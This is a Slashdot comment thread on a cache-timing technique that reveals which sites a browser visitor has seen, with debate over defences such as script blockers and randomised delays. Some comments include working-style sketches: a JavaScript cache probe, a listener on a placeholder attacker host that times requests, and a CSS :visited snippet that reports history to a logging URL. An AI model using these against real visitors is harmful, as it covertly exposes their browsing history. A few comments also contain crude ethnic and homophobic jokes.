Browser History Sniffing Is Back
An anonymous reader writes "Remember CSS history sniffing? The leak is plugged in all major browsers today, but there is some bad news: in a post to the Full Disclosure mailing list, security researchers have showcased a brand new tool to quickly extract your history by probing the cache, instead. The theory isn't new, but a convincing implementation is."
Easy work-around (Score:5, Informative)
Re:Easy work-around (Score:5, Insightful)
Re:Easy work-around (Score:5, Informative)
Cache and history are completely different features. A cache size of 0 means you'll have to download the same CSS/JS/image files over and over again for each page on the same website, which is a waste of resources for both you and the server.
Re:Easy work-around (Score:5, Insightful)
Re:Easy work-around (Score:4, Informative)
There are plenty of cases where actual content - images, videos, etc - benefit from caching. It's not all garbage.
Re: (Score:2)
Re:Easy work-around (Score:5, Insightful)
You might not care, but the guy paying for the server's bandwidth certainly does ;)
Re:Easy work-around (Score:4, Informative)
There is a large difference between "user" and "customer". The problem is that you may think you are a "customer" (or at least a potential customer) of every site you visit, but this is incorrect.
"Customer" implies that there is a business relationship in play, however if it is a forum or other free resource, you will never be a customer as there is nothing to purchase. Not every website on the internet is a business.
It is often seen as abuse when a user downloads or needlessly accesses a resource multiple times, and website administrators often have no qualms about blocking abuse: it means less load on the site's server, more resources free for other users (bandwidth, connection slots on the webserver daemon), and potentially a lower bill.
Speaking from experience, I've seen people use download managers and deliberately misconfigure them so they open 20-100+ connections to a file, feeling that the website somehow owes them that file; doing the same thing in a browser is no different.
Re: (Score:2)
Re:Easy work-around (Score:5, Interesting)
If I'm trying to infer where you've been, a nicely formatted history list (often with handy metadata, timestamps, etc.) sure is handy, if I can get access to it; but it's also an obviously juicy target, and something that browser designers are going to try to keep me away from.
Your cache is a lot messier; but it does provide grounds for inference about where you've been (and thus can retrieve from cache in essentially zero time) and where you haven't recently been (and thus have to burn a few tens to hundreds of milliseconds retrieving from a remote host). Worse, unlike history (which is really just a convenience feature for the user, and can be totally frozen out of any remotely observable aspect of loading a page; those purple links aren't life or death), the browser cache is an architectural feature that cannot be removed without sacrificing performance, and cannot even be easily obfuscated without sacrificing performance. It's a much lousier dataset than the history, since history is designed to document where you've been while the cache only does so partially and incidentally; but it is one that is harder to get rid of without user-visible sacrifices and increases in network load...
Re:Easy work-around (Score:4, Interesting)
You wouldn't need to eliminate the cache, just Javascript's ability to measure the load times reliably. For example, you could prevent scripts from reading the state of a particular resource during, say, the first 500 milliseconds after setting its URL, regardless of the source used (cache or network).
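A rough sketch of that idea, expressed at script level just to show the timing behavior (the comment proposes it as a browser-level change; QUIET_MS, loadWithQuietPeriod and the 500 ms figure are illustrative assumptions, not a real API):

// Don't let anything observe whether a resource loaded until a fixed quiet
// period has elapsed, so cached and network loads look identical up to then.
const QUIET_MS = 500;

function loadWithQuietPeriod(url: string): Promise<boolean> {
  const started = performance.now();
  return new Promise((resolve) => {
    const img = new Image();
    const settle = (loaded: boolean) => {
      const remaining = Math.max(0, QUIET_MS - (performance.now() - started));
      // Delay the observable outcome until the quiet period is over.
      setTimeout(() => resolve(loaded), remaining);
    };
    img.onload = () => settle(true);
    img.onerror = () => settle(false);
    img.src = url;
  });
}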
Re:Easy work-around (Score:5, Informative)
It would also be a bit tricky, because inferential attacks wouldn't necessarily have to ask politely for the state of the resource they are interested in; they could instead attempt something else (say, a script operation that will fail in a particular way unless the 3rd-party resource is available). Barring a solution much cleverer than I can think of, you'd be at considerable risk of having to break progressive loading of pages entirely (or at least into human-visible-and-annoying stuttery chunks) in order to prevent a page from interrogating its own state on the client and correlating it with timestamps on requests to servers controlled by the attacker...
Re: (Score:2)
Here's an idea to kill the cache attack: have cache loads simulate the network connection speed. Have the browser gather stats on its network use. Say the average load speed (call it AVGSPD) is 100KBps and the average lag (call it AVGLAG) is 0.5s. If it's about to load a big 500KB image from cache, it first introduces a delay of AVGLAG*random(0.5,1.5), and then an additional delay of FILESIZE/(AVGSPD*random(0.9,1.1)), so fetching the file would take somewhere around 5 seconds. This simulates the slowness of an actual network fetch.
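A back-of-the-envelope sketch of that delay calculation, using the numbers from the comment (random() here is a small helper, not a standard function):

// Average observed download speed and latency, per the example above.
const AVGSPD = 100 * 1024;  // bytes per second (100 KBps)
const AVGLAG = 0.5;         // seconds

// Uniform random value in [min, max).
const random = (min: number, max: number) => min + Math.random() * (max - min);

// Total artificial delay (in seconds) before a cached file is handed to the page.
function simulatedCacheDelay(fileSizeBytes: number): number {
  const lag = AVGLAG * random(0.5, 1.5);
  const transfer = fileSizeBytes / (AVGSPD * random(0.9, 1.1));
  return lag + transfer;
}

// For the 500 KB image in the example this lands around 5-6 seconds,
// roughly what an uncached fetch over the same link would take.
console.log(simulatedCacheDelay(500 * 1024).toFixed(2), "seconds");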
Re: (Score:2)
You would think so... (Score:4, Interesting)
But according to how this exploit works they are not "completely different". They, in fact, have a small overlap. Apparently the exploit works by using JavaScript to load a file from a website and see how fast it loads. It infers you have been to a website if the file loads quickly.
They seem to have a trick to stop the process just before the browser puts the loaded file into the cache which prevents it from poisoning the very cache it is "testing".
Thus, setting cache to 0, which the OP recommends, and which I have been doing for years, is exactly the fix needed. I admit that I do not know why he also disables history, as that would not help with this exploit.
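For illustration, a probe along those lines might look something like the following (a hedged sketch, not the actual tool; the 20 ms threshold and the src-clearing abort are assumptions about typical browser behavior):

// Request a static resource the target site is known to serve, and treat a
// very fast completion as evidence it was already in the cache.
const CACHE_HIT_MS = 20;

function probeCached(url: string): Promise<boolean> {
  return new Promise((resolve) => {
    const img = new Image();
    const started = performance.now();
    let settled = false;

    const finish = (hit: boolean) => {
      if (settled) return;
      settled = true;
      resolve(hit);
    };

    // A completion inside the threshold is taken as "served from cache".
    img.onload = () => finish(performance.now() - started < CACHE_HIT_MS);
    img.onerror = () => finish(false);

    // If nothing has completed by the threshold, call it "not cached" and
    // cancel the request; clearing src aborts the load in many browsers,
    // which is roughly how a probe can avoid filling the cache it is testing.
    setTimeout(() => {
      if (!settled) {
        img.src = "";
        finish(false);
      }
    }, CACHE_HIT_MS);

    img.src = url;
  });
}

Run over a list of candidate URLs, one static resource per site of interest, this yields the kind of per-site yes/no guesses the demo pages show.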
Re:You would think so... (Score:5, Insightful)
The script doesn't actually analyze the cache, just the time it takes to load the resource, so if your proxy's cache is fast enough it might still be detected.
Re: (Score:2)
Plus, with a shared proxy cache, one compromised machine in your LAN leaks the whole family's browsing history. Looks like the OP's strategy is actually making things worse regarding this exploit.
Re: (Score:2)
Sorry, I meant GP.
Re: (Score:3)
Except that if you read the article, it targets your cache, not your history.
It just tries to load resources from various sites to see whether they load quickly or not. If yes, they're in the local cache; if not, they aren't. Thus it's used to tell how recently you have visited a site (whether it's still in cache).
History -- I keep that going back about 240-360 days... much faster and more useful than Google.
I mean, if I wanna go to a site, why would I go to Google rather than typing in a few letters of the site -- and it knows which ones I visit most... all s
Re: (Score:2)
Re: (Score:3, Funny)
If your ultimate purpose was more privacy, I find it VERY amusing that you ended up willingly sharing everything with Google, of all parties. :D
Re: (Score:2)
There's a browser plugin you can use to anonymize Google queries, although if you signed up for a Gmail account in a more innocent time like I did and haven't migrated to your own hosting yet, the best thing you can do to reduce your Google footprint is to open your Gmail/Google Reader/Youtube/whatever pages in a separate browser from everything else. Firefox could use "tab sandboxing" - where individual tabs can be like their own private browsing session, basically. I think Chrome has something like that.
Re: (Score:2)
It's a valid concern. Last I remember, the only thing Chrome sends off is search requests as you type them, but now Firefox does that too (to use the search provider's autocomplete feature). Of course, if you don't want to trust Chrome, there's always Chromium.
Re: (Score:2)
Yep, but first install a Squid proxy on an internet-facing machine, set all internal browsers to proxy through it, and then set all browsers to use a cache size of 0.
Re: (Score:3, Informative)
If I correctly understand how this attack works, they could easily read your proxy cache the same way.
Re: (Score:2)
How will that prevent this exploit? It could if your proxy is not faster than your internet connection... but what purpose would your proxy serve then?
Re: (Score:2)
if you both turn off all your scripting and caching
But neither of us turns off all our scripting and caching, so the problem persists.
Re: (Score:2)
But in order not to scare you further: if you turn off javascript, 80% of the connecting ad networks won't load any ads (or their profiling stuff),
and if you both turn off all your scripting and caching, I won't be able to profile much besides your visits to sites running within our ad network.
Haha, if only. A lot (and I mean A LOT) of tracking services use pure HTML tracking; to disable them you have to control cross-domain requests. Ghostery or RequestPolicy are good plugins for doing this.
Unreliable (Score:3, Informative)
This tool seems unreliable (at least in Chrome). I've been on YouTube five times in the past 48 hours and it still showed up grey on the sniffer.
Re: (Score:2, Funny)
This tool seems unreliable (at least in Chrome). I've been on YouTube five times in the past 48 hours and it still showed up grey on the sniffer.
Most likely an OS/Vendor issue.
If you're using a Mac, pretty much every sniffer tool will show up ghey.
Re: (Score:2)
Yeah, it's too inaccurate to be convincing. A random algorithm weighted on popularity could have a similar success rate. Maybe if the number of tested sites were increased it would be more clear whether it works or not.
Re: (Score:3, Funny)
That's great news. The Mexicans at Lowe's are really overpriced.
Re: (Score:2)
Facebook's "like" button is a tracking widget, that loads a page which then contains JS to do more in-depth analytics if you're not using a script blocker. The page the Like button fetches is probably what the test page checks for.
Not surprising (Score:1, Insightful)
Browser developers are not doing proper development anymore. They are too busy playing stupid games like hiding http://, removing status bars, inflating the version numbers and breaking your extensions to do things like security or proper memory management.
Hard to block this (Score:5, Interesting)
This kind of timing attack isn't easy to block.
Some kinds of timing attacks are. I think I heard once that a timing attack could be made against passwords in TOPS-20, because the passwords were stored in plaintext and compared one character at a time. The trick was to do the system call to check the password (or whatever it was) with the guess split across a page boundary (maybe the second page was forced out of memory or something). Since the system call would return as soon as one character didn't match, it was easy to see if the next character being guessed was correct or not. The fix was simple enough. Obviously there was a bit more to it than that, but I only heard this apocryphally as it was, and at that probably about 25 years ago.
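The essence of that old attack is just an early-exit comparison; a toy illustration of the vulnerable pattern and the usual fix (nothing to do with actual TOPS-20 code, just the general idea):

// Vulnerable pattern: returns as soon as a character differs, so the time
// taken leaks how many leading characters of the guess were correct.
function earlyExitEquals(secret: string, guess: string): boolean {
  if (secret.length !== guess.length) return false;
  for (let i = 0; i < secret.length; i++) {
    if (secret[i] !== guess[i]) return false; // early bail-out -> timing leak
  }
  return true;
}

// The usual fix: always inspect every character, so the comparison time does
// not depend on where the first mismatch occurs.
function constantTimeEquals(secret: string, guess: string): boolean {
  if (secret.length !== guess.length) return false;
  let diff = 0;
  for (let i = 0; i < secret.length; i++) {
    diff |= secret.charCodeAt(i) ^ guess.charCodeAt(i);
  }
  return diff === 0;
}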
This kind of thing is harder to fix, since it depends upon the difference between cache and non-cache access time, and the non-cached access time is not deterministic. It would be possible for the browser to introduce an artificial delay into the appropriate JavaScript calls, but that would make performance go down the tubes.
In any event, I tried it and the results didn't look very accurate (the first time, all of the sites it tried claimed that I had hit them; the second time it claimed only one site was in cache, and after that it thought that nothing was).
Javascript required? (Score:5, Informative)
Re:Javascript required? (Score:5, Insightful)
Re: (Score:2)
...and it confuses the hell out of a lot of people who don't understand what javascript is. "I just want to see the webpage"
Rather than trying to get people to use what is frankly an arcane and imprecise tool, we would be better off removing the incentive which makes data theft valuable. This then becomes an economic and social problem rather than a technical one; there are few situations where social problems can be solved well with technical means.
Re: (Score:2)
I ended up replacing it with RequestPolicy, as half the time I ended up having to enable all the javascript to get the page to load anyway. I mostly just wish it provided a way to blacklist things like Facebook that never add any value to the site.
Re: (Score:2)
Facebook's tracking is just the tip of the iceberg...look at Ghostery's downloadable blocklist.
Re: (Score:2)
I think you might be mistaking "difficult" for "it takes time to do it". Until marketing/bean counters/PHBs realize they're giving their web devs about a third as much time as they should, most of the time things like "graceful degradation" get turned into "it works in the CEO's browser, it's done."
Re: (Score:2)
Graceful degradation is a nice theory. That's all it is until you apply some form of constraints, because it's discussed as if it remains abstract. But realistically, how big a percentage of users will actually require access to a fully degraded website?
Small. Very.
Because the great majority of them use a browser similar to the CEO's. It's not really a bad measure unless the CEO is a te
Re:Javascript required? (Score:4, Interesting)
YES! I 2nd that! But it should be better integrated and off by default -- they can try to nudge users into using it by other means. I have NoScript set to allow scripts by default just because I was sick of whitelisting everything, but any site I feel bad about I blacklist. It's not as secure, but it is doing something. Add a subscription list like AdBlock has and it wouldn't be so bad for people who want to help compile black and white lists. Normal users would get a blacklist with it always on by default, and others who know better will know enough to flip the policy. The paranoid would turn off the subscription lists and do it all themselves.
I would like a power-user area to block certain DOM features completely. I do not trust canvas or most of the newer DOM features by default; the browser should ask me to OK those when a site tries to use them. (The lists mentioned above could specify what is whitelisted or blacklisted, not just whole domains, etc.) Actually, I'm also wary of CSS3 fonts, because font rendering engines haven't been a focus of security work, and as for 3D drivers... you are lucky to have stable, fast 3D; security is currently a pipe dream.
A DOM js access list by domain would be a lot like a sandbox system for websites.
Re: (Score:2)
True. They may not be exploited at the time you visit, but when you return; it may not target your browser either. Sure, it is not foolproof, but blocking javascript completely isn't full protection either. ALLOWING Flash is probably more of a risk anyhow.
Re:Javascript required? (Score:4, Informative)
It's very easy to manage
I've installed NoScript for non-technical people and it almost immediately caused them headaches.
There are plenty of internal academic/work websites that rely on fetching scripts from third parties...
Which is exactly what NoScript is designed to prevent.
And then there are endless websites that want you to allow scripts from a CDN or Google APIs or social bookmarking.
NoScript's generic default allows aren't inclusive enough to keep websites from breaking for most people.
Re: (Score:3)
I've noticed that. When I'm using NoScript I tend to spend most of my time enabling things on sites, as oftentimes I can't even see the site. I've found that RequestPolicy is a lot easier to use in many ways, but it unfortunately lacks any sort of blacklist, so you're limited in what you can do as far as blocking portions of a site's javascript collection.
Re: (Score:2)
You do realize that NoScript does a lot of other things as well, right? And just because pretty much everything gets enabled fairly quickly doesn't make NoScript worthless; it just means that you don't receive as much protection. I personally find it to be quite helpful when I click a link from a search engine and end up somewhere I don't want to be.
Re:Javascript required? (Score:4, Insightful)
And this won't stop as long as most people are stupid enough to accept browsers that will just run whatever random script some random website hands them. Unfortunately, it's a bit of a chicken-and-egg problem in that way. If the major browsers behaved sanely, these insanely bad web practices wouldn't work, and the insanely bad "web designers" who come up with them would have to learn to write real web pages or find another line of work. As is, too many people don't know and don't want to know, and we all pay the price in one way or another.
I'll keep my NoScript and be happy that broken pages actually display as broken for me, so I know to avoid them, rather than having my browser just blindly download and execute whatever crap code the broken web page needs to make it look like something else.
Re: (Score:2)
It's definitely not easy enough for the average user. My dad's better than average with computers and he struggles with it sometimes.
Suggest NoScript to implement Whitelist loader (Score:4, Interesting)
Perhaps you are both right.
Let's start with the idea that NoScript by default is enabled.
Let's continue with the notion that application management should be as minimal as possible.
I give firewall software as a good example. If it is not easy to do one of the following, then the software (in my opinion, for me) fails:
1) Monitor all software incoming / outgoing. Block anything not on the whitelist, log connections, provide an interface in the *background* for the user to allow or deny in the future as Rules
2) Monitor all software incoming / outgoing. Allow all by default, log all connections, provide an interface for the user to allow or deny in the future as Rules
NoScript does most of this already. What it lacks is a reliable whitelist, similar to that used by Ghostery or AdBlock Plus, which loads the user up with 99% of the Rules they need.
I agree with your comment. For most users, you can whitelist all major bank sites - knowing that 99% of the time the sites are fine.
If the user disagrees then they can modify this setting.
Add onto that list a whole bunch of sites where the root site should be able to be trusted; news sites - slashdot, news.com, guardian, age, newspapers, etc.
Build onto that well-known commercial sites.
Make this list auto-update once per month, but never override user-set preferences.
There you go. A tool very similar in nature to Adblock Plus and Ghostery which upon startup has a configuration to protect users and supply 99% of the functionality needed.
If this was the case, then I would put this on lots of people's PCs, knowing that if there are issues then they can be dealt with.
Although, at the moment, Ghostery + AdBlock Plus on Firefox provide most of the protection needed in a usable, safe and coherent manner.
Re: (Score:2)
It's useful for being able to visit random websites without fear of Javascript exploits. Also useful for selectively blocking websites, such as Facebook (I do not trust it, and Facebook stuff is embedded everywhere).
Re: (Score:3, Informative)
Nope. NoScript protects against the relatively common attack vector of malicious 3rd-party scripts being injected into a site you already trust, via exploits or ad networks. In this scenario the site will try to load malware from http://lolhax.biz/ [lolhax.biz] or whatever, which it doesn't normally do and you haven't permitted, so it fails. It saved me once when a PHP forum I visited often got hacked.
Re: (Score:2)
This appears to require Javascript. Thank you, noscript.
It doesn't, really. This proof of concept is implemented using Javascript, because it's easier, but the basic concept doesn't require Javascript to work.
Re: (Score:3)
How do you observe download timings without Javascript?
Re: (Score:3)
Re: (Score:2)
How does that work considering that most browsers download resources in parallel (even if they actually load them to the page in order), particularly from different domains?
Re: (Score:2)
There's a limit to the number of resources they'll download in parallel; it would probably be necessary to saturate that first. In fact, filling up all of the available download slots might really help -- request a bunch of resources from a server that will respond to the connection request but not complete it. Then the attacker could start timing from the instant the server completes the pre-timing request, and stop when the server receives the post-timing request. Some similar methods could be used t
Re: (Score:2)
Doesn't that assume the page controls the total pool? My Firefox instance has eight established connections; with Ajax or background loading tabs, it's hardly unexpected that some other website will take over the only available socket, making a cached load appear as slow as a remote request.
Re: (Score:2)
Mmm, yes, I was assuming there's a pool per tab. With Chrome, since each tab is a separate process, I'm pretty sure that's the case.
I don't think that's an insuperable problem, though. The attacker can just watch the requests that are supposed to saturate the pool coming into the server, and if they stop arriving he can assume the pool is full. At that point he knows how large the available pool is, factoring in other connections already established, and can "release" enough connections to allow the pa
Re:Javascript required? (Score:4, Informative)
Oh, ok, but NoScript blocks those too, so betterunixthanunix's point still stands.
convincing implementation (Score:5, Interesting)
Convincing to who? to you?
ACM [acm.org] was quite convinced back in 2000 when they published the paper.
They obviously implemented it because it contains a lot of measurements.
Re: (Score:1)
Convincing to who? to you?
ACM [acm.org] was quite convinced back in 2000 when they published the paper.
They obviously implemented it because it contains a lot of measurements.
Convincing to browser developers, obviously, who moved to fix the other problems fairly quickly but have, to date, done nothing about this one.
And obviously, yes, they implemented a method for doing this back in 2000 for that paper. It's what's being referred to when the author notes, "Such attacks were historically regarded as fairly impractical, slow, and noisy - and perhaps more importantly, one-shot." What we have now, though, is a method that is fast, practical, and nondestructive.
Re: (Score:3)
Convincing to browser developers, obviously, who moved to fix the other problems fairly quickly but have, to date, done nothing about this one.
Are you kidding me? The CSS visited link vulnerability took ages to get fixed.
What we have now, though, is a method that is fast, practical, and nondestructive.
It's too inaccurate to be practical. Try it.
without javascript (Score:4, Interesting)
They say it can work without javascript, but I do not believe that. None of the samples work without javascript. In the paper, it says:
We omit the straightforward but tedious details of how to write HTML that causes popular browsers to make serialized accesses to files.
Can anyone provide this tedious, but allegedly straightforward, and extremely critical detail?
Re: (Score:1)
HTML is typically rendered in the order that it is read; therefore it's possible to know that A is requested before B, etc.
With that in mind you can sandwich your request to twitter between two dummy requests to a server that you control.
Server compares the timing on the dummy requests and can guess the timing for the real one.
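A hedged sketch of what the measuring server might look like, taking the comment's serialized-request premise at face value (Node's built-in http module; the host name, paths, and the GIF response are illustrative assumptions, not the paper's actual setup). The page served to the victim would contain, in order: an <img> pointing at /mark?before, an <img> for the target site's resource, and an <img> pointing at /mark?after; the gap between the two /mark hits then approximates how long the middle resource took, near zero when it came from the victim's cache.

import * as http from "http";

const marks = new Map<string, number>(); // client address -> time of "before" mark

http
  .createServer((req, res) => {
    const client = req.socket.remoteAddress ?? "unknown";
    const url = new URL(req.url ?? "/", "http://attacker.example");

    if (url.pathname === "/mark") {
      if (url.searchParams.has("before")) {
        marks.set(client, Date.now());
      } else if (url.searchParams.has("after") && marks.has(client)) {
        const gap = Date.now() - marks.get(client)!;
        console.log(`${client}: middle resource took ~${gap} ms`);
      }
    }
    // Return a tiny response either way so the <img> request completes.
    res.writeHead(200, { "Content-Type": "image/gif" });
    res.end();
  })
  .listen(8080);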
Re: (Score:3)
There's a little more to it than that. Browsers open multiple connections in parallel. Historically, this was limited by the HTTP specification to two simultaneous connections, but recent versions of browsers have increased this limit. You'd have to detect how many simultaneous connections were in use (or hack it by detecting the browser) and make requests to enough tarpits to bog down all but one of the connections. It would probably be fairly reliable, but the work to build that just to demonstrate t
Re: (Score:1)
Wow, I was wondering the same thing, then I found this -
http://whattheinternetknowsaboutyou.com/docs/details.html [whattheint...outyou.com]
Skip down to the CSS section:
<style>
a#link1:visited { background-image: url(/log?link1_was_visited); }
a#link2:visited { background-image: url(/log?link2_was_visited); }
</style>
<a href="http://google.com" id="link1">
<a href="http://yahoo.com" id="link2">
The background-image is only loaded on the visited state...
Re:without javascript (Score:4, Informative)
This is already fixed in most browsers, you need to update/reconfigure yours.
How (Score:5, Informative)
Yay stateless web.
Fix: add a random delay for reporting time to load (Score:2)
It seems like you could add a random delay of up to a couple hundred milliseconds before the browser reports that an iframe has successfully loaded, making it harder to tell by the timing.
Re: (Score:3)
Except that would make JavaScript slower, which is the exact opposite of what the browser makers are going for.
Re: (Score:2)
Yes, it definitely would. You could certainly limit the scope to only apply to cross domain queries for out of viewport/small/hidden iframes, but that still might cause slowness issues for legitimate uses.
Re: (Score:2)
1/ actually read the article
2/ post cliff notes about it
3/ points
Works like a charm.
Now on topic: I clicked and it shows nothing because of my OCD: Ctrl-Shift-Del, Enter.
Private Browsing mode FTW! (Score:4, Insightful)
When I visit a "sensitive" site, like my bank, I open a new browser session and close it when I finish. Aside from that, I just don't worry about it, and have never had a problem. Hell, even that great data-mining wizard Google - My home page and probably the single most frequent site I hit - Always defaults me to Georgia (presumably the location of my ISP's HQ), missing by over a thousand miles.
Easy enough (Score:5, Interesting)
Tried the test for Opera, and it mostly worked (missed Newegg). Tried it in a private tab; it didn't work at all. So any site you don't want tracking you, you load in a private tab. Which you should anyway.
Out of curiosity, I also tried the FF test (in Opera, still) and the IE test. The IE test worked, better even than the dedicated test, while the FF test failed utterly. Curious.
And of course, as always, this test only works for the specific sites you test for, not generally. But that isn't surprising. It wasn't terribly fast, either; I'd certainly notice if you tested for hundreds or thousands of sites.
Alt-t, d, enter (Score:3, Interesting)
It's a Dutch boy's thumb in the dike, but that quick key combo clears history in Opera. I just habitually hit it between domains to kill tracking without screwing up sites that need cookies or JS to function. Likely there's a Firefox equivalent.
What neither has by default is a way to do this automatically. Browser makers finally got around to letting us limit cookies to the visited site, but they could go much further.
Like just making the browser cache per-domain -- there's no need for all domains to share the same cache.
Maybe it's the fetish for the "fastest" browser? It just seems the makers aren't doing what can be done easily enough on modest modern machines to improve privacy.
A possible fix (Score:3)
While this specific implementation is very inaccurate, others using a similar method may work. An obvious workaround for these kinds of attacks is to turn off caching, but that would increase loading times. I was wondering if there is a hack in some browser that would allow you to ban a site from using resources from another domain, whether via HTML or scripts. Does anyone know of such a solution?
Re:A possible fix (Score:4, Informative)
AdBlock Plus lets you do that very easily.
e.g.
Block fsdn.com on third-party sites except slashdot.org
||fsdn.com^$third-party,domain=~slashdot.org
Block fbcdn.com on third-party sites except facebook.com, facebook.net, and fbcdn.net (write similar rules to block the other 3 facebook domains)
||fbcdn.com^$third-party,domain=~facebook.com|~facebook.net|~fbcdn.net
Re: (Score:2)
Yeah blocking individual sites is possible, but imperfect from a security perspective.
Re: (Score:2)
By which you mean it's limited to a finite number of sites?
The number of sites they can check for is also finite.
The number of sites in my history/cache is also finite.
Note that currently it's "yes" or "no", and "no" is indistinguishable from "blocked". They could make it slightly more reliable if they actively checked to see whether I was blocking (e.g. Grooveshark pops up a warning box if it can't load the Facebook integration).
Re: (Score:2)
While it's possible to create a rule for every site you visit, it is impractical. The number of sites they can check is irrelevant, because you don't know which sites they will be testing for. The number of sites in your cache can be limited, but what sites are in it changes constantly.
Re: (Score:2)
You'd probably think it impractical to go through the history and click "Forget About This Site" for sites which you don't want it remembering you visited. Which, in my case, is most of the sites I don't frequent.
Re: (Score:2)
Other possible fixes:
Re: (Score:2)
If that's overkill for your requirements, I recommend Ghostery, which uses a blacklisting approach and includes a long list of tracking/ad services.
Better have good gag reflexes (Score:5, Funny)
Really? I call BS (Score:2)
I ran this "test" three times in succession. On the first go it showed sites which, yes, I might have been to, though one of them, Dogster, I was fairly certain I had not. I then clicked it again, and this time it came up with almost every site in green. Running it a third time gave the same results as the first attempt.
Re: (Score:2)
Well, running Safari, it did get that I had visited Slashdot.
For Facebook, it for some reason thought I had gone to Twitter, though.
(I know there's no Safari version there, but the IE version did that.)
Cache Experiment (Linux) (Score:2, Interesting)
I'm using Linux and I'm trying the same thing that I do with Adobe Flash... I /dev/null it...
cd .mozilla/firefox/xxxxxxx.default (replace the x's with your specific alphanumeric string)
rm -rf Cache (deletes the Cache dir and all subfolders)
ln -s /dev/null Cache (creates a symlink from Cache to /dev/null)
Since nothing escapes the event horizon that is /dev/null, your Cache is written but cannot be inspected by others seeking to pry into your well-deserved privacy.
So far, so good. I have noticed no slowness by doing t
Re: (Score:2)
In either case, wouldn't doing this with the ~/.macromedia directory cause many Flash apps (especially video players that rely on the LSOs for storing buffered video) to malfunction?
Convenience (Score:2)
You can buy your bread and butter at the local grocery with all your neighbors watching.
Or you can put on a disguise and go to the other end of town, which takes time and increases traffic.
Simple fix? (Score:2)
It seems to me there's an easy way to make browsers immune to this: Introduce random delays when cached resources are fetched from other sites via JavaScript.
In a well-designed web page, the static (i.e. cached) resources are referenced in the HTML (often in the head) and are not subject to timing attacks, as they can be fetched in random order.
When something is requested dynamically via JavaScript, it is typically not in the cache anyway, so there is rarely a performance penalty.
When there is a performance pena
Re:but you have to run their software to do it... (Score:5, Informative)
jacked or tracked: it's your choice (Score:1)
If it's a reputable site - my bank, my VOIP provider, even the main domain for youtube or something - sure, run the software. But random scripts from weird sites? You have to be a few cards short of a full deck to trust random shit from the internet. It's the damn *internet*. Anyone can do anything on it, so it only takes about three functional neurons to realize that you should use a bit of caution. Even if you don't get jacked, you'll get tracked!
Re: (Score:1)
Ha ha ha oh wow.
Re:jacked or tracked: it's your choice (Score:5, Interesting)
If you think "reputable" means "safe", YOU'RE a few cards short of a full deck!
Re: (Score:3, Funny)
'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind.'
Re: (Score:2)
A guy I work with has been compromised twice: Once on his work PC visiting Drudge Report. The other was on his home PC while he was... err... never mind. Let's just say he's only been compromised once from a non-adult website and leave it at that.
Re: (Score:2)
And that is exactly why these scripts are run in a browser, and not directly from your desktop or so.
One of the tasks of a web browser is to provide a script jail, where scripts can run safely, and where they can access resources they need but nothing more. You are downloading stuff from the Internet to display - that's how web browsing works of course. And that is why I want to be able to put trust in my browser that it will do everything it can to prevent these scripts from breaking out of their jail, an
Re:Multiple tests give conflicting results (Score:4, Informative)
That's because the test consists of downloading a file and measuring whether it was instantaneous (cached) or not. Of course, the second time you run it, the script itself will have downloaded (and therefore put in the cache) the same file, tricking itself.
Re: (Score:2)
It is meant to be non-destructive to the cache.
In other words, they don't actually download the files. They request the files and see if the browser starts parsing them within a certain time frame (indicating a cached document). Regardless, they abort the request after that time limit, so the document is never cached.
If it did down